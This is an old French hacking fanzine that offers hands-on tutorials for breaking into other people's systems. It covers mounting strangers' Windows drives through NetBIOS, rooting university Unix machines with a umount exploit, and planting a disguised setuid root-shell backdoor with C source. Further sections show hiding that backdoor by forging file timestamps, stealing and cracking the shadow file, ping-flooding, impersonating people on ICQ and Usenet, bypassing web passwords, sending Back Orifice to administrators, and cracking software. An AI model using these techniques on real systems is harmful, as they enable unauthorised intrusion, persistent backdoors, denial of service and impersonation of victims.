Toutes les informations contenues
dans ce fanzine n'y sont qu'à titre purement informatif! Il vous
est déconseillé de les appliquer, sous risques d'amendes
et de poursuites judiciaires. Moi ou mon serveur (actuellement Multimania),
ne seraient être tenus responsables de ce que vous ferez de ces informations!
Lieu ou se situe le site | Adresse |
Cambridge, MA
Eastern USA |
ftp.crl.research.digital.com |
Cambridge, MA
Eastern USA |
ftp.x.org |
New York city
Eastern USA |
ftp.duke.edu |
Washington, DC
Eastern USA |
ftp.digex.net |
Minneapolis, MN
Central USA |
ftp.cs.umn.edu |
West Lafayette, IN
central USA |
ftp.cs.purdue.edu |
Palo Alto, California
Western USA |
ftp.digital.com |
Albuquerque, NM
Southwest USA |
ftp.khoros.unm.edu |
British Columbia
Canada |
ftp.cs.ubc.ca |
Czech Republic (République Tchèque) | ftp.eunet.cz |
England | ftp.sunsite.doc.ic.ac.uk |
Europe | ftp.eu.net |
Finland | ftp.eunet.fi |
Finland | ftp.funet.fi |
France | ftp.univ-lillel.fr |
Germany | ftp.gwdg.de |
Germany | ftp.rz.uni-wuerzburg.de |
Germany | ftp.uni-paderborn.de |
Greece | ftp.ntua.gr |
Iceland | ftp.isnet.is |
Ireland | ftp.ieunet.ie |
Norway | ftp.unit.no |
Poland | ftp.sunsite.icm.edu.pl |
Portugal | ftp.puug.pt |
Spain | ftp.asterix.fi.upm.es |
Sweden | ftp.sunet.se |
Switzerland | ftp.switch.ch |
United Kingdom | ftp.mcc.ac.uk |
Hong Kong | ftp.cs.cuhk.edu.hk |
Japan | ftp.sunsite.sut.ac.jp |
South Africa | ftp.is.co.za |
Israel | ftp.huji.ac.il |
Voici deux techniques qui vont vous permettre de prendre le contrôle
d'un disque dur (une troisième technique est en préparation...).
La première
technique, pour l'utiliser vous devez avoir NETBIOS et votre victime
doit avoir
Windows 95 ou Windows NT. La deuxième technique est beaucoup
plus simple...
mais vous devez convaincre votre victime d'accepter votre fichier pour
ensuite vous
connecter sur le port 666 avec Ws_ftp (plus de détail plus bas...)
1) Première technique avec NETBIOS
==================================
LE PRINCIPE :
Depuis que NT 3.51 existe, Microsoft a implementé des commandes
permettant de
communiquer avec d'autres PC, tout ca juste avec un driver pour votre
carte
réseau, le protocole NETBEUI d'installé, et le tout en
ligne de commande, ce
qui permettait de réaliser des installations … distance par
exemple. C'est
d'ailleurs encore beaucoup utilisé, une simple disquette de
boot, et paf, vous
pouvez installer plein de postes. Ce protocole NETBEUI, reposant sur
NETBIOS,
vous permet entre autres de partager des ressources sur le réseau,
… condition
d'avoir install‚ le client "Client pour le r‚seaux Microsoft", et d'avoir
activé l'option "Permettre … d'autres utilisateurs d'utiliser
mes fichiers".
Dans ce cas, vous pourrez alors voir ce qui est partagé dans
le fameux
Voisinage réseau de Partageur 95 ou de NT 4. Certains d'entre
vous sont en
train de lire ceci, se dise : "Arfff le con, il sait même pas
que Internet ça
repose sur les protocoles TCP/IP et pas NETBEUI". Et là, je
vous réponds :
"Je sais mon enfant, mais il existe une passerelle !!". "Une passerelle
?
Entre NETBEUI et TCP/IP ?? Je le crois pas ? C'est pas possible ???"
me
répondrez vous !! Et pourtant si !! Microsoft ne pouvait pas
se permettre
d'interdire ce type de passerelle, car tous les réseaux Internet
utilisent
TCP/IP, et il fallait un moyen de convertir les noms de machines sous
NETBEUI
en adresse IP. C'est ce que fait le fichier LMHOST dans votre répertoire
WINDOWS. Logiquement, si vous regardez maintenant, il n'existe pas,
mais en
revanche vous devez avoir un LMHOSTS.SAM qui traîne, qui est
un fichier
d'exemple. Allez donc y jeter un coup d'oeil...
Donc vous avez compris, avec LMHOST, on peut donc aller voir les ressources
partagées de quelqu'un, à partir du moment qu'on connait
son IP, le nom de sa
machine et ses ressources partagées. Et il faut aussi qu'il
ait des ressources
partagées évidemment, mais ça faut pas être
polytechnicien pour le comprendre.
Vu comme ça, ça fait beaucoup de choses à savoir,
mais pas tant que ça en fin
de compte, pour avoir ces renseignements, voici comment faire...
Première chose, pogner l'IP. Là, rien de plus facile,
vous repèrez l'IP ou
l'adresse du gars sur IRC par exemple. Si c'est l'IP numérique
du type
123.123.123.123, pas de problème, si c'est un truc du genre
marcel@routeur.domaine.com, vous faites: PING -a routeur.domaine.com
et vous
aurez son IP. Voilà une bonne chose de faite. Maintenant, ça
serait sympa de
savoir le nom d'ordinateur de la personne dont vous voulez voir le
disque dur.
Pour cela, Bill nous offre la fonction NBTSTAT qui permet de voir l'‚tat
d'un
adapteur réseau, et les infos le concernant.
Tapez donc (Dans Ms-Dos, ouvrez donc une fenêtre dos...) :
NBTSTAT -A 127.127.127.127 <- L'adresse IP de la cible hein , pas
celle ci...
Ah oui, le -A signifie que c'est une adresse IP numérique que
l'on donne.
N'OUBLIEZ PAS LA MAJUSCULE)
Si la cible a NETBEUI d'installé, vous devriez obtenir un truc
du style :
C:\>NBTSTAT -A 194.114.95.141
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MAURO <00> UNIQUE Registered
MICA <00> GROUP Registered
MAURO <03> UNIQUE Registered
MAURO <20> UNIQUE Registered
MICA <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
(SI C'EST ECRIT "HOST NOT FOUND", C'EST QUE VOUS DEVEZ
CHANGER DE CIBLE...CAR ELLE N'A PAS NETBEUI D'INSTALLE.)
Ce qui vous intéresse c'est les noms avec écrit UNIQUE
à côté. Votre cible
utilise forcément l'un de ces noms de machines en ce moment
même !! Et c'est
là qu'intervient LMHOSTS.
Vous éditez LMHOSTS avec EDIT (dans une fenêtre Ms-Dos,
tapez "edit") par
exemple, et vous tapez dans ce fichier :
194.114.95.141 MAURO #PRE
Donc, l'IP, suivi du nom de machine, suivi de #PRE, pour indiquer que
cette
correspondance entre l'IP et le nom de machine doit être préchargé,
pour ainsi
passer AVANT la résolution DNS. (Si vous ne voulez pas vous
fatiguer à editer,
tapez donc "echo 194.114.95.141 MAURO>> c:\windows\lmhosts", ca revient
à la
même chose...)
Ensuite, on va réinitialiser notre fichier LMHOSTS que vous venez
juste de
sauvegarder, n'est ce pas ? Pour cela, vous tapez :
C:\>NBTSTAT -R
Et si tout se passe bien, vous obtenez :
"Successful purge and preload of the NBT Remote Cache Name Table."
Maintenant, nous allons nous occuper de chercher les ressources partagées
par
notre copain.
Pour voir les ressources, vous allez taper NET
VIEW, VIEW comme "voir" en
anglais, remarquez comme les choses sont bien faites. D'ailleurs cette
commande NET est extrêmement puissante, faites donc un NET /?
Pour vous en
convaincre !! Donc, ça doit donner un truc comme :
NET VIEW \\MAURO (MAURO car là…
nous passons sur le protocole
NETBEUI,
LMHOSTS va se charger de convertir le
nom de machine en IP)
Et hop, dans mon exemple, ça donne ça :
C:\>NET VIEW \\MAURO
Ressources partagées … \\MAURO
Nom de partage Type Commentaire
---------------------------------------------------
C Disque
D Disque
E Disque
HP4L Impr.
G Disque
I Disque
Exécution achevée.
Je sais donc que tous ces lecteurs sont partagés. Parfait, on
va donc aller
faire un tour sur le C: .
La commande NET arrive à ma rescousse :
C:\>NET USE \\MAURO\C
K: Connect‚ … \\MAURO\C
Et voilà…, le disque C de la cible est devenu mon disque K: Super
non ? Vous
pouvez alors tout visiter et foutre le bordel (ca, c'est tellement
dégueux que c'est à
faire qu'aux pédophiles, antisémites, fascistes, ...).
Si vous avez un problème pour la commande NET, utilisez donc
ce moyen bien
plus simple et facile d'utilisation :
- clic sur "Démarrer" , "rechercher" , "Ordinateur" et tapez
le nom de l'ordi distant
(ici : "MAURO" )
- une fois l'icône trouvé, double-clic dessus , et voilà
la fenêtre de SON poste de
travail qui s'ouvre... Bon Fun ! : ^ )
- Comment hacker sa fac en quelques leçons (Octagon):
Cet article s'adresse aux debutants sous unix
qui ont pas envie de se prendre
la tete a maitriser et qui ont besoin d'avoir
acces au compte de leurs profs
par exemple (mais pour quoi faire au juste ?)...
Materiel necessaire.... NoRoute #1..
Un account sur une becanne unix de la fac..
Une legere connaissance de unix..
Une conscience..
Sous unix le seul account interessant est l'acces
root. Nous sommes bien
d'accord, root est le compte qui vous permet
de tout faire sur un systeme.
Son user_id est 0 est son group_id est le meme..
Commencez tout d'abord par reconnaitre le systeme
utilise par la machine,
chaque systeme a ses holes et ses problemes...
Pour cela, faites appel a
"uname -a" qui vous donnera une reponse franche
:
SunOS 4.1.4 par exemple.. Vous avez desormais
acces a un systeme bourre de
bugs potentiellement exploitables... La grande
mode en matiere de hack, et
la grande technique utilisee par tous de nos
jours car elle est simple et
efficace et ne demande pas une grande connaissance
du systeme est l'exploit.
L'exploit est un petit programme ou une serie
de commande trouvee par un
ingenieux bonhomme qui permet souvent de chopper
l'acces root sur un systeme.
Obtenir des exploits n'est pas tres complique...
Un petit ftpsearch sur
exploit vous donnera au moins un ftp bourre d'exploits
pour differents systemes
que vous n'aurez plus qu'a utiliser pour chopper
le root..
Un exploit celebre est celui de la commande umount
sous BSD. Si cette commande
possede le bit suid c'est a dire si "ls -l /bin/umount"
vous donne un truk
comme:
-rwsr-xr-x (presence du 's' vous l'avez vu ?)
et que la version de umount est assez ancienne,
alors vous pouvez chopper un
root sur le systeme. Vous choppez l'exploit sur
votre chti ftp, que nous
appelerons ici mount.c
Vous le compilez donc:
host:~> cc mount.c -o exploit
host:~> exploit
Discovered and Coded by Bloodmask and Vio, Covin
1996
bash# whoami
root
bash#
Et vous etes root. La simplicite de la chose explique
pourquoi de nos jours
il y a tellement de jeunes abrutis qui annoncent
fierement leurs root dans
#hack... =) Cet exploit utilise en fait une architecture
de code propre aux
mauvais programmes qui permet de modifier
l'adresse de retour d'un call.
En effet, le programme umount devient root pendant
son execution grace
au bit suid. En l'executant et en forcant le
retour d'un call vers une routine
qui execute un shell, on obtient ainsi un shell
root...(voir exploits... =)
C'est un exemple parmi tant d'autres.. Disons
franchement qu'en cherchant bien
sur le net et en essayant betement tous les exploits
propres a un systeme, meme
si vous etes une grosse brelle en matiere d'unix,
vous arriverez a chopper le
root dans votre fac huh... Bien entendu les administrateurs
systemes des facs
sont au courant de ces exploits et fixent en
permanence leur systeme contre
ceux-ci (du moins dans ma fac, ou j'ai eu un
mal fou a chopper le root arf)..
Une fois que vous etes root, vous ne pouvez bien
entendu pas vous permettre d'
utiliser l'exploit en question a chaque fois
que vous desirez passer root
sur le syteme, pour la simple raison que ce hole
ne restera pas longtemps en
place...
Il vous faut donc planquer quelquepart un chti
programme qui vous donnera
l'acces root tout le temps mais qui ne sera pas
decouvert par le root lui-meme..
Le mieux est d'avoir acces aux sources d'un programme
suid peu souvent change
par la fac que vous pourrez modifier pour vous
donner un shell lorsqu'il est
appele avec certains arguments... Par exemple,
integrer a login.c un test
if (!strcmp(username,"sorcery")) return (0);
qui vous permettra de vous logger en root depuis
n'importe ou... Sans laisser
de traces sur le syteme. L'exemple ci-dessus
ne tient absolument pas compte
du code original de login.c le but est seulement
de vous faire piger le
principe... =)
Un autre moyen, utilisable dans les systemes peu
surveilles, mais assez
discret quand meme, est de vous creer votre programme
a vous, suid, qui vous
donnera le root... Bien entendu il faut securiser
ce programme en le deguisant
en programme normal. Donnez lui un nom qui fasse
"vrai" et qui justifie le
bit suid par exemple "xfixconsole" qui d'apres
son nom necessite un acces a
la console et donc un root..
Placez le dans un repertoire peu frequente tel
que /usr/X11R5/bin/ par exemple.
Voici un exemple de code:
----8<-----8<-------8<--------8<-------cut here-------8<------8<-------
/* Xfixconsole by Sorcery
Sacre joli nom huh...
Ne donne le shell que si il est
appele ansi:
host:~> xfixconsole fixing
*/
void main(int argc, char *argv[]) {
if ( (argv[1]) && (!strcmp(argv[0],"xfixconsole"))\
&& (!strcmp(argv[1],"fixing")) ) {
setuid(0);
setgid(0);
system("/bin/bash");
} else {
printf("\nFixed
0xA000\n");
}
}
----8<-----8<--------8<--------8<----------cut
here---------8<--------
Ensuite, compilez le programme et placez le dans
le repertoire voulu...
bash# cc xfixconsole.c -o xfixconsole
Avant de le deplacer, nous allons noter la date
de derniere modif du rep
/usr/X11R5/bin... ("ls -l /usr/X11R5"). Disons
que nous trouvons Jan 1 1994.
bash# mv xfixconsole /usr/X11R5/bin/
Il faut maintenant lui donner les permissions
voulues (+s) pour qu'il puisse
changer son uid et son gid a 0...
bash# chmod +s /usr/X11R5/bin/xfixconsole
bash# ls -al !$
ls -al /usr/X11R5/bin/xfixconsole
-rwsr-xr-x 1 root
wheel 38613 Jan 1
1997 .../bin/xfixconsole*
bash#
voila qui est mieux. Maintenant il faut cacher
ce fichier: il y a trois choses
a modifier pour que le fichier passe discretement:
-la date du fichier
-son proprietaire
-la date du '.' (eh oui, la date du rep a change
aussi)
Pour cela, nous mettons le fichier a la meme date
que les fichiers qui lui
sont proches: (cela passe bien lorsqu'une serie
de cinq fichiers sont cotes
a cotes et ont la meme date...)
bash# ls -l /usr/X11R5/bin/xf*
-r-xr-xr-x 1 root
bin 385636 Jul 28 1995
/usr/X11R5/bin/xfig*
-rwxr-xr-x 1 root
bin 148600 Jun 24 1995
/usr/X11R5/bin/xfile..
..manager*
-rwsr-xr-x 1 root
wheel 38613 Jan 1 1997
/usr/X11R5/bin/xfix..
..console*
-rwxr-xr-x 1 root
bin 117344 Jun 18 1995
/usr/X11R5/bin/xfm*
-rwxr-xr-x 1 root
bin 770 Jun
18 1995 /usr/X11R5/bin/xfm.ins..
..tall*
-rwxr-xr-x 1 root
bin 14184 Jun 18
1995 /usr/X11R5/bin/xfmtype*
bash#
bash# touch -t 180614591995 /usr/X11R5/bin/xfixconsole
bash# touch -t 010114591994 /usr/X11R5/bin
bash# chgrp bin /usr/X11R5/bin/xfixconsole
bash# ls -l /usr/X11R5/bin/xfixconsole
-rws--x--x 1 root
bin 38613 Jun 18
1995 /usr/X11R5/bin/xfix..
..console*
Vous avez desormais un chti root sympa sur le
systeme, qui vous permettra de
bien vous marrer.
A verifier cependant avant d'installer un tel
prog: les crontabs. Dans
/usr/spool/cron/crontabs/root, vous trouverez
une liste d'instructions
executees automatiquement par le systeme pour
le root. Verifiez bien qu'aucun
script n'est lance qui detecterait par exemple
les nouveaux suid installes
sur le systeme (utilisant generalement la commande
find) ou autre chose
qui vous grillerait...
Choppez maintenant le fichier shadow, ou son
equivalent selon les systemes..
(passwd.orig, passwd.secure, /auth/*/*...)..
et crackez vous deux ou trois
accounts a l'aide d'un cracker trouve sur le
net (guess, par exemple, ou
crack etc..). Cela vous permettra de ne plus
vous logger avec votre compte
pour bidouiller le systeme, ce qui peut etre
assez pratique parfois...
Passons maintenant a une aventure qui m'est arrivee
dans ma fac et qui
pourrait bien vous arriver si votre fac utilise
plusieurs parcs de systemes
differents...
J'avais le root sur le parc HPUX, et besoin du
root sur les SunOS de ma
fac. Mon home etait le meme sur les deux, car
le meme disk etait partage
par NFS entre les becannes. Le disque etait en
local sur HPUX et en NFS
sur les SUNS. Le but etait donc d'exploiter le
root de HPUX pour ne pas
avoir a essayer des dizaines d'exploits sur la
sun dont le sunos etait
plutot bien protege... Voici donc la methode
utilisee:
sun:~> indique que les commandes sont tapees sur
la sun.
hp:~> indique que ma mere m'appelle pour diner
ahum.
sun:~> cc xfixconsole.c -o root
j'avais donc dans mon home, le fichier xfixconsole.c
compile pour sunos, bien
entendu non executable sur la hp...
hp:~> cd /usr/X11R5/bin
Car '/usr/X11R5/bin/xfixconsole fixing' ne marchera pas.. =)
hp:/usr/X11R5/bin/> xfixconsole fixing
bash_hp# cd
bash_hp# chown root.wheel ./root
bash_hp# chmod 755 ./root
bash_hp# ls -al ./root
-rwsr-sr-x (.../...) root
bash_hp#
sun:~> ./root
bash_sun# whoami
root
bash_sun#
En utilisant mon home comme passerelle, j'ai donc
reussi a executer sur la
sun un suid via nfs... Il faut savoir que cela
ne marchera que si:
1) Le root obtenu est sur la machine ou le home
est local: via nfs, le root
n'a pas le droit de modifier des
fichiers qui ne lui appartiennent pas,
et en particulier les rendre suid
arf.. (sauf en "insecure"...)
2) Le filesystem est mounte via NFS sans le flag
"nosuid" : pour verifier,
faites un df ., qui vous donnera
les flags separes par des virgules en
plus de la place disk... (rw,nosuid...)
La meme manip est donc utilisee sur la sun...
Pour utiliser touch sous sunos,
il faut passer par /usr/5bin qui contient les
binaires repondant aux normes
SVR4 (system 5 release 4), car le /usr/bin de
sunos contient un touch qui ne
permet pas de specifier une nouvelle date...
A la fin donc, si j'ai bien tout calcule, on se
retrouve avec un controle
total de la fac qui peut etre assez plaisant
=)...
[MAiS QUE FAiRE AVEC CE r00t ?]
Bonne question...
Plusieurs activites sont marrantes a faire avec
un root. Il y a tout d'abord
le flood, qui, si vous avez le root sur un reseau
a grande bande passante,
vous permet de faire couler pas mal de connections
14.4 sur le net...
Pour cela, plusieurs utilitaires existent sous
linux par exemple, a peu pres
tous bases sur le syn flood qui a tendance a
plus trop marcher. Le ping est
encore assez efficace: ping -f host en particulier
si vous avez la bonne
version de ping....est assez mechant quand il
est utilise avec des '&' par
exemple while (1)
while> ping -f host &
while> end
est assez marrant.... pour arreter le massacre,
killer le while puis faire un
killall ping... ICMP rulez! =)
On peut egalement sniffer avec un root...si le
systeme est un noeud important
pour d'autres becannes, ou si il est beaucoup
frequente, il est possible de
chopper, en ecoutant les connections reseaux,
plusieurs acces un peu partout
et pourquoi pas d'autres rewts.. =)
Enfin, le but du rewt est surtout de l'avoir,
ensuite imaginez vous tout
simplement aux commandes d'un systeme en 64Mbits
sur le net et vos idees
viendront vite... =)
-SorcerY
Grmbl..
Placons ici quelques greetings =)
Le truk chiant dont personne a rien a foutre
sauf
Octagon
Le site du FBI: http://www.fbi.gov: aucun accès ftp en anonyme possible! Accès telnet possible (nous verrons ce cas de figure après)
Le site de la NASA: http://www.nasa.gov: aucun accès en ftp possible.
- Accès telnet aux comptes telnet d'un site:
En tant normal, nombreux sont les sites importants qui
ont un compte telnet... Comment vérifier rapidement si tel est le
cas!!!
Bon! La méthode la plus simple consiste à faire sous
navigateur: telnet://www.url.com ou .gov etc...
Mais il y a de nombreuses chances qu'il y ait un time out qui vous
fasse perdre la connexion assez rapidement comme c'est le cas du FBI si
on essaie: telnet://www.fbi.gov
Cela donne:
Ceci est un cas échéant (le site fait de
l'IP filtering), donc il est tout à fait possible qu'une connexion
soit maintenue!
Pour essayer de maintenir la connection on va utiliser une méthode
moins rapide, se connecter sur l'IP du site (Cela ne marche que rarement).
Vous allez sous DOS vous faites (les ">" ne devant pas être écrits):
> tracert www.fbi. gov
ENTREE
Et l'IP du site du FBI est le 32.97.253.60. Vous ouvrez telnet à
partir de votr pc et vous essayez de vous connecter au compte du FBI. Dans
le cas échéant vous vous retrouverez avec une connexion d'hôte
perdue... Laissez donc tomber l'idée d'accéder aux comptes
du FBI, puis essayez d'accéder à leur rooter par telnet:
165.87.34.184, ou encore à leurs ftp sous DOS en faisant (les ">"
ne devant pas être écrits):
> ftp
> open
> www.fbi.gov
ENTREE
Et utilisez un passcrack pour DOS.
Si vous essayez telnet://www.cia.gov ou nasa.gov, vous verrez qu'il
n'y a aucun compte à l'autre bout! En fait c'est qu'il n'y a aucun
compte du nom de www.cia.gov ou de nasa.gov.
Donc il faut prendre l'IP du site! si il a un compte vous tomberez
dessus.
Vous tracez donc les deux et vous avez comme adresse IP de la CIA:
198.81.129.99, et celui de la NASA est le 198.116.116.10.
Donc vous essayez d'écceder à cet comptes telnet par
l'I, mais je vous le dis, celà menne à un échec. Vous
laissez donc tomber l'idée d'accéder aux comptes telnet de
la CIA et du FBI, car il y a d'autres sites où ça marche
très bien, telnet://www.hacker.com
par exemple.
- Effacer les messages dans les groupes de news (avec Netscape Navigator version 4.03):
Aller sur un groupe de news, séléctionner
un message puis faire (les ">" ne sont pas à faire):
> edition
> préférences
> identité; puis mettre le nick et l'E-mail (tout doir être
exact) de la cible, puis faire OK.
Annuler le message avec "suppr".
Prendre un nick sous icq:
En fait c'est une technique bête comme chou, mais
à laquelle il fallait panser! Inutile d'avoir des icq cracker ni
autre chose, juste icq. Bon, la technique est simple à réaliser.
sachez quand même que seul l'UIN diffèrera de celle de votre
victime. Mais pour se faire passer pour quelqu'un c'est l'idéal.
Ouvrez icq et faites (les ">" ne doivent pas être écrits):
> ICQ
> Add/Change Current User
> Register a New User(ICQ#)
Prenes toutes les infos de votre victime dans la rubrique infos, créez
un nouvel User à son nick et à ses infos, puis pour alterner
faites:
> Change the Active User
Si vous avez plus de 5 ou 6 users vous ne pourrez en créer plus.
Rajouter des numéros à votre compteur:
Là aussi c'est un truc bête comme chou: allez dans le fichier source de votre page, recherchez le compteur et recherchez le numéro actuellement inscrit! Z'avez plus qu'à changer le N° de personnes entrées sur votre site, sauvez et faites passez en ftp!
Faire sauter un pass en général sur une page HTML:
Certains le savent d'autres non, il vous suffit de regarder
le fichier surce et de regarder ou se trouve le pass:
Par exemple sur ce code source du site: http://www.jacksgame.com:
function passMe() {
var Goop = document.Qbert.PWORD.value
document.Qbert.PWORD.value
= Goop.toUpperCase()
if (document.Qbert.PWORD.value
== "WATERS") {
location.href="../desktop/index.html"
}
if (document.Qbert.PWORD.value
!= "WATERS") {
alert("Close but no cigar!");
Voilà... Autre type de solution, (si il vous est possible de la faire) vous regardez vers quel lien mène le bouton de validation, et vous n'avez plus qu'à entrer ce lien, à la suite de l'url base.
Accès aux indexs des sites ou serveurs:
Prenons un serveur inintéressant au possible mais
qui fera un bon exemple. Nous allons prendre le serveur: http://www.hacker.com
Vous vous connectez sur ce site, qui ne parle en rien de hack... (en
fait si mais il est désormais impossible de me vérifier).
Donc vous allez regarder le code source de la page; celà vous donne:
<html>
<head>
<title>
H A C K E R . C O M
</title>
</head>
<body bgcolor=ffffff background=./images/greenback.gif>
<center>
<tr>
<img src="./images/hackertop.gif"><br>
<table>
<tr>
<td>
<a href="resources.html"><img src="./images/1.gif"
border=0></a><br>
<a href="proshops.html"><img src="./images/2.gif"
border=0></a><br>
<a href="equipment.html"><img src="./images/3.gif"
border=0></a><br>
<a href="course.html"><img src="./images/4.gif"
border="0"></a><br>
</td>
On va s'arrêter là. Inutile d'inscrire la suite.... En
fait il n'y a que ce qui est en rouge qui est intéressant.
Ici on a le "lieu" où sont stockées les images. C'est
dans le répertoire /images. Donc on tape l'url: http://www.hacker.com/images
et on rentre sur l'index d'images. Et voilà. Vous êtes sur
l'index des images et donc vous pouvez voir TOUTES les images à
voir sur le site et qui sont passées en ftp. Vous pouvez essayez
sur d'autres sites avec d'autres répertoires comme /files ou d'autres
noms. Essayez aussi: http://www.scoregames.com/Images
Pour protéger un index il faut créer un répertoire
index.htm.
Passer une protection par un lien:
Une certaine option permet de passer les pass sur certains
sites. Plus en détail avec quelques exemples: allez sur le site:
http://altern.org/hackers
Cliquez sur Files. Le password est "clanhkc". Mais ce n'est point le
password qui nous intéresse. Il est en effet possible de passer
cette protection sur certains sites dans le même genre! Regardez
le source, en effet il est important d'avoir les informations exactes,
mais regardez le source du cadre en ayant le doigt posé sur le lien,
sinon ça ne donnera rien:
<A HREF="#" OnClick="cadre('main.html','bottom.html');" onmouseover="color('menu1','menu1a');
self.status='HKC - MAIN';return true" onmouseout="color('menu1','menu1');
self.status='HKC';return true"><IMG SRC="menu1.gif" BORDER=0 WIDTH=94
NAME='menu1'></A><BR>
<A HREF="#" OnClick="cadre('http://www.messagezone.com/message.asp?BoardName=103905','bot_join.html');"
onmouseover="color('menu2','menu2a'); self.status='HKC - JOIN';return true"
onmouseout="color('menu2','menu2'); self.status='HKC';return true"><IMG
SRC="menu2.gif" BORDER=0 WIDTH=94 NAME='menu2'></A><BR>
<A HREF="#" OnClick="password('prot_mem.html','bot_mem.html');"
onmouseover="color('menu3','menu3a'); self.status='HKC - MEMBERS';return
true" onmouseout="color('menu3','menu3'); self.status='HKC';return true"><IMG
SRC="menu3.gif" BORDER=0 WIDTH=94 NAME='menu3'></A><BR>
<A HREF="#" OnClick="password('prot_files.html','bot_files.html');"
onmouseover="color('menu4','menu4a'); self.status='HKC - FILES';return
true" onmouseout="color('menu4','menu4'); self.status='HKC';return true"><IMG
SRC="menu4.gif" BORDER=0 WIDTH=94 NAME='menu4'></A><BR>
<A HREF="#" OnClick="password('prot_news.html','bot_news.html');"
onmouseover="color('menu5','menu5a'); self.status='HKC - NEWS';return true"
onmouseout="color('menu5','menu5'); self.status='HKC';return true"><IMG
SRC="menu5.gif" BORDER=0 WIDTH=94 NAME='menu5'></A><BR>
<IMG SRC="menu6.gif" BORDER=0 WIDTH=94><BR><BR>
C'est ce qui est en rouge qui nous intéresse plus
particulièrement. Vous n'allez pas vous faire chier avec le pass
n'est-ce pas? alors vous utilisez un passage du nom de protected plus l'expension
en rouge, ce qui donne pour accéder aux files sans mettre aucun
password: http://altern.org/hackers/protected/prot_files.html
Vous y voilà! C'est pas beau tout ça????
Pour commencer, vous devez avoir un minimum de connaissances
de Linux ou UINX. Sinon vous pourrez toujours essayer mais celà
vous paraitra moins évident.
Il faut d'abord essayer d'obtenir le maximum d'informations
sur le site à pirater: les sous-répertoires, les indexs,
l'adresse IP du site, le webmaster, ne pas hésiter à le tracer
sous différents tracers/pingers (Le meilleur étant WS_PINGPR),
l'adresse e-mail des webmasters, vérifier si les ftp par le navigateur
sont protégés (ftp://ftp.url.com), les stats aussi (http://www.url.com/stats),
le tracer sous DOS pour avoir l'adresse du rooter, essayer les accès
telnet etc... Celà fait beaucoup mais pett à petit, en franchissant
les étapes on arrive à avoir des résultats concluants.
D'abord vérifier l'accès telnet (telnet://www.url.com),
si il existe un compte vous demandant un login et un mot de passe, vous
pouvez essayer de franchir ces barrières et ce sera une bonne chose
de faite. vous vérifier les failles du site et essayez de les exploiter.
par exemple si l'éccès par ftp://ftp.url.com est possible,
vous n'avez qu'à aller dans etc/passwd et regarder les noms des
utilisateurs. Vous pourrez ensuite vous connectez dessus par ftp avec le
nom d'user sous DOS, en faisant (les ">" ne devant pas être écrits):
> ftp
> open
> www.url.com
Si les ftp par navigateur, ne sont pas accessibles utilisez
WS_PINGPR et allez dans info, puis tracez le site 2 ou 3 fois si il n'y
a rien de concluant. Il y a 90% de chances d'obtenir les noms des contacts
du site, leurs N° de tel. et leurs adresses E-mail. Utilisez ces noms
comme logins sous ftp ou telnet. Celà peut marcher. Si vous n'arrivez
absolument pas à obtenir ce genres de résultats laissez tomber
et rabattez-vous sur autre chose, car sinon vous ne pourrez pas faire grand
chose.
Pour la suite, une fois les logins vérifiés
vous n'avez plus qu'à cracker les pass telnet, ftp sous DOS et vous
pouvez vous amuser. Sinon autre solution, bien plus rapide mais plus risquée
et qui a presque toutes les chances de ne pas marcher. Vous envoyez le
serveur de Back Orifice à l'administateur système, et vous
le tracez puis vous prenez les pass, foutez la merde etc... C'est efficace
et net!!! Sinon vous pouvez toujours (mgnihihi!) essayer d'être rooter
du serveur, mais comme c'est super-dur et quasiment infaisable sans mettre
un peu de pognons dans des livres qui en parle, ou d'avoir l'élite
pour pote...
Voilà j'espère que ça vous aura aidé!!!
Cours de Crack #1 - par Frog's Print - Juin 1997
--------------------------------------------------------------------------------
-SUJET : Introduction au Cracking - 1ère Partie
Désassembler
un fichier pour le craquer
Conseils
et Documentations
-EXEMPLE : ComSpeed 2.01
-OUTILS : W32Dasm6 (ou W32Dasm85) et une cervelle
--------------------------------------------------------------------------------
1/ INTRODUCTION
2/ EXECUTION DU CRACK
3/ CONSEILS
4/ LIVRES
--------------------------------------------------------------------------------
1/ INTRODUCTION
Ce premier cours, destiné avant tout aux débutants, va
vous donner quelques notions sur
le cracking. Si vous ne connaissez pas grand chose à l'Assembleur,
ce n'est pas bien grave
puisque je ne vais pas trop vous faire de bourrage de crâne sur
ce sujet (pas encore...:=)
mais je vous conseil de vous munir d'un livre (voir section "4/LIVRES"
plus bas) sur
ce langage puisqu'il vous sera quand même nécessaire de
connaitre la différence entre
un "Jmp", "Jz', "Jnz" et autres "Jae".
Mais rassurez-vous, nous allons surtout utiliser la logique et notre
cervelle ce qui suffira
pour craquer environ la moitié des softs de votre disque dur.
Nous allons craquer ComSpeed 2.01 (53,750 Ko) pour Win 3.X et Win95.
ComSpeed est disponible entre autre sur la page web de son auteur:
(http://ourworld.compuserve.com/homepages/Cordes/). A l'heure ou je
rédige ce cours,
on ne trouve plus cette version mais la version 2.11.
Ce n'est pas grave le schéma de protection est EXACTEMENT le
même donc dès que vous
aurez bien assimilé ce cours vous n'aurez qu'a vous faire la
main sur la dernière
version.
Après tout, vous êtes ici pour apprendre pas pour piquer
les cracks des autres et y
mettre votre nom, hein?
ComSpeed est un petit programme qui vous montre les performances de votre modem.
Il a deux types de protections (en fait il en a 3 mais nous verrons
cela plus loin..:-):
-Il est limité dans le temps à 120 jours d'utilisation.
-Il est protégé par un mot de passe qui permet son débridage.
Il existe 2 méthodes pour craquer un programme:
1/ -"Live Approach".
2/ -"Dead Listing".
1/ "Live Approach" consiste à deboguer le programme (l'exécuter
pas à pas) avec un debugger
(comment ne pas nommer ici SoftIce 3.01) en posant des Breakpoints
et en le traçant.
Cette méthode est tout particulièrement adaptée
aux programmes nécessitants un mot
de passe (comme ComSpeed) ou ayant un "NagScreen".
2/ "Dead Listing" consiste a désassembler le programme et a chercher
dans le listing
le schéma de protection pour le modifier à son gré.
Cette méthode est assez formidable
pour peu que vous connaissiez un peu l'Assembleur. Vous pourrez modifier
le programme,
lui faire faire ce que VOUS voulez! Cette méthode s'applique
très bien aux programmes
nécessitants un mot de passe mais aussi et surtout aux "Démos"
bridées qui ne vous
permettent pas de sauvegarder un fichier, de l'imprimer, ou bien limitées
dans le temps
ou avec un "nagscreen"...
Cette méthode peut paraitre assez effrayante aux yeux des débutants
en raison de la taille
importante du listing obtenu de certains programmes Windows (désassembler
la démo de Quark
XPress donne un fichier de plus de 50 Mo que même Word6 n'arrivera
pas a ouvrir:-).
Cependant, les schémas de protections sont souvent situés
dans une toute petite zone
